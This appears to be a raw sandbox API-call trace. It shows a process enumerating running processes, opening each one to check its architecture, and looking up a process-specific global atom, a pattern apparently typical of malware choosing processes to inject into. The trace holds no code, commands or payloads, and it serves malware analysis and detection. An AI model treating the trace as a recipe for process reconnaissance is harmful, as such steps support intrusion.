	[0096.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.997] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0096.997] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.998] CloseHandle (hObject=0x248) returned 1
	[0096.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x6590e8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0096.998] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.998] CloseHandle (hObject=0x248) returned 1
	[0096.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x6590c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0096.998] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.998] CloseHandle (hObject=0x248) returned 1
	[0096.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65ac68, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.998] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0096.998] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.998] CloseHandle (hObject=0x248) returned 1
	[0096.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x6590c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0096.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0096.999] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.999] CloseHandle (hObject=0x248) returned 1
	[0096.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658c68, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0096.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0096.999] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.999] CloseHandle (hObject=0x248) returned 1
	[0096.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x6590e8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.999] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0096.999] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.999] CloseHandle (hObject=0x248) returned 1
	[0097.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0097.000] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.000] CloseHandle (hObject=0x248) returned 1
	[0097.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0097.000] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.000] CloseHandle (hObject=0x248) returned 1
	[0097.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x658da8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0097.000] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0097.000] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.000] CloseHandle (hObject=0x248) returned 1
	[0097.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x658ee8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0097.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0097.001] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.001] CloseHandle (hObject=0x248) returned 1
	[0097.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0097.001] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.001] CloseHandle (hObject=0x248) returned 1
	[0097.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fd28, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.001] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0097.001] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.001] CloseHandle (hObject=0x248) returned 1
	[0097.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658c68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0097.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0097.002] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.002] CloseHandle (hObject=0x248) returned 1
	[0097.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0097.002] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.002] CloseHandle (hObject=0x248) returned 1
	[0097.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fe78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0097.002] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0097.002] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.002] CloseHandle (hObject=0x248) returned 1
	[0097.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x658d28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0097.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0097.003] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.003] CloseHandle (hObject=0x248) returned 1
	[0097.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0097.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0097.003] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.003] CloseHandle (hObject=0x248) returned 1
	[0097.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x658f08, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0097.003] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0097.003] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.003] CloseHandle (hObject=0x248) returned 1
	[0097.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658c68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0097.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0097.004] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.004] CloseHandle (hObject=0x248) returned 1
	[0097.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658c68, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0097.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0097.004] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.004] CloseHandle (hObject=0x248) returned 1
	[0097.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.004] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0097.004] GetLastError () returned 0x5
	[0097.004] GetLastError () returned 0x5
	[0097.004] GetLastError () returned 0x5
	[0097.004] GetLastError () returned 0x5
	[0097.004] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.005] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.006] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0097.006] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.006] GetLastError () returned 0x5
	[0097.007] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.007] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.008] GetLastError () returned 0x5
	[0097.009] GetLastError () returned 0x5
	[0097.009] GetLastError () returned 0x5
	[0097.009] GetLastError () returned 0x5
	[0097.009] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.009] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0097.009] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0097.009] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0097.009] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0097.009] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0097.009] CloseHandle (hObject=0x248) returned 1
	[0097.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0097.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0097.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0097.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0097.010] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.010] CloseHandle (hObject=0x248) returned 1
	[0097.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65ad58, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0097.010] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0097.010] CloseHandle (hObject=0x248) returned 1
	[0097.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fe78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0097.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16728) returned 0xc0000004
	[0097.060] VirtualAlloc (lpAddress=0x0, dwSize=0x16828, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0097.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x16828, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0097.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0097.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fe78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0097.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0097.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0097.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0097.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0097.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0097.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fe90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0097.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0097.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0097.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0097.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0097.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0097.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65ac68, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0097.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0097.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0097.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0097.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0097.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
